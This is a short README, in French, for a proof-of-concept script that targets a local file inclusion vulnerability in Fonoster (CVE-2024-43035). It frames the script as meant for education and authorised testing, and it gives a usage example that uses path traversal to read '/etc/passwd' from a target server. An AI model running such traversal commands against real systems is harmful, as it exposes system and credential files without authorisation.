
Preuve de concept d'exploitation de la vulnérabilité LFI de Fonoster (CVE-2024-43035)
Ce dépôt contient un script de Preuve de Concept (PoC) démontrant une vulnérabilité d'inclusion de fichier local dans Fonoster. Cet outil est destiné uniquement à des fins éducatives et de tests autorisés.
Pour récupérer un fichier local depuis le serveur :
python3 fonoster_lfi_poc.py --url <url_du_serveur_fonoster> --path <chemin_du_fichier_à_récupérer>
Exemple :
python3 fonoster_lfi_poc.py --url http://example.com --path "../../../etc/passwd"